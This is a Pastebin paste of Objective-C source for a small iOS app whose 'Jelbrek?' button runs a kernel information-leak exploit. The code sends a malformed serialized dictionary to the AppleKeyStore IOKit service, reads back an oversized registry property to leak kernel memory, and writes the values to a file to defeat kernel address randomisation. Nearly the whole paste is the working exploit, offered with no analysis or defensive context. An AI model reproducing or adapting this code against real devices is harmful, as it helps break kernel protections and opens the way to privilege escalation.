Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #import "RootViewController.h"
- #import <mach/mach.h>
- #import <stdio.h>
- #import <stdlib.h>
- #import <unistd.h>
- #import <string.h>
- #import <assert.h>
- #import <pthread.h>
- #import <sys/syscall.h>
- #import <sys/kauth.h>
- #import <sys/stat.h>
- #import <IOKit/IOKitLib.h>
- #import <IOKit/iokitmig.h>
- #import <IOKit/OSMessageNotification.h>
- kern_return_t io_service_open_extended(mach_port_t service, task_t owningTask, uint32_t connect_type, NDR_record_t ndr, io_buf_ptr_t properties, mach_msg_type_number_t propertiesCnt, kern_return_t *result, mach_port_t *connection);
- kern_return_t io_registry_entry_get_properties(mach_port_t registry_entry, io_buf_ptr_t *properties, mach_msg_type_number_t *propertiesCnt);
- kern_return_t io_service_get_matching_services_bin(mach_port_t master_port, io_struct_inband_t matching, mach_msg_type_number_t matchingCnt, mach_port_t *existing);
- @implementation RootViewController
- enum {
- kOSSerializeDictionary = 0x01000000U,
- kOSSerializeArray = 0x02000000U,
- kOSSerializeSet = 0x03000000U,
- kOSSerializeNumber = 0x04000000U,
- kOSSerializeSymbol = 0x08000000U,
- kOSSerializeString = 0x09000000U,
- kOSSerializeData = 0x0a000000U,
- kOSSerializeBoolean = 0x0b000000U,
- kOSSerializeObject = 0x0c000000U,
- kOSSerializeTypeMask = 0x7F000000U,
- kOSSerializeDataMask = 0x00FFFFFFU,
- kOSSerializeEndCollection = 0x80000000U,
- };
- - (void)viewDidLoad {
- self.view.backgroundColor = [UIColor whiteColor];
- UIButton*myButton = [UIButton buttonWithType:UIButtonTypeRoundedRect];
- myButton.frame = CGRectMake(21, 80, 100, 35);
- [myButton setTitle:@"Jelbrek?" forState:UIControlStateNormal];
- [myButton addTarget:self action:@selector(myButtonPressed) forControlEvents:UIControlEventTouchUpInside];
- [self.view addSubview:myButton];
- }
- - (void) myButtonPressed {
- get_kernel_slide();
- }
- unsigned int get_kernel_slide() {
- unsigned int kslide = 0;
- unsigned int fixedAddr = 0;
- uint32_t dict[] = {
- 0x000000d3,
- kOSSerializeEndCollection | kOSSerializeDictionary | 2,
- kOSSerializeSymbol | 4,
- 0x00414141,
- kOSSerializeEndCollection | kOSSerializeNumber | 0x200,
- 0x41414141,
- 0x41414141
- };
- size_t idx = sizeof(dict);
- io_service_t serv = 0;
- io_connect_t conn = 0;
- io_iterator_t iter = 0;
- mach_port_t master = MACH_PORT_NULL, res = MACH_PORT_NULL;
- kern_return_t kr = 0, err = 0;
- // IOKit master port routine
- host_get_io_master(mach_host_self(), &master);
- // Check if dict is valid
- kr = io_service_get_matching_services_bin(master, (char*)dict, idx, &res);
- if(kr == KERN_SUCCESS) {
- // dict is valid
- } else {
- return -1;
- }
- // create a connection to AppleKeyStore
- serv = IOServiceGetMatchingService(master, IOServiceMatching("AppleKeyStore"));
- // create our user client using the malicious dictionary
- kr = io_service_open_extended(serv, mach_task_self(), 0, NDR_record, (io_buf_ptr_t)dict, idx, &err, &conn);
- if(kr == KERN_SUCCESS) {
- // IOUserClient is valid
- } else { // Failed
- return -1;
- }
- IORegistryEntryCreateIterator(serv, "IOService", kIORegistryIterateRecursively, &iter);
- io_object_t object = 0;
- uint32_t bytes = 0;
- char buf[0x200] = {0};
- while(bytes == 0) {
- if(object) {
- IOObjectRelease(object);
- // free the previous object
- }
- object = IOIteratorNext(iter);
- mach_msg_type_number_t bufCnt = 0x200;
- //read the 'AAA' property
- kr = io_registry_entry_get_property_bytes(object, (char*)"AAA", (char*)&buf, &bufCnt);
- bytes = *(uint32_t*)(buf);
- }
- // leaked data has now been read
- FILE *f = fopen("/var/mobile/kaslr_dump.txt", "w");
- for (int a = 0; a < 128; a += 4) {
- fprintf(f, "%#x\n", *(uint32_t*)(buf + a));
- }
- fclose(f);
- }
- @end
Advertisement
Add Comment
Please, Sign In to add comment
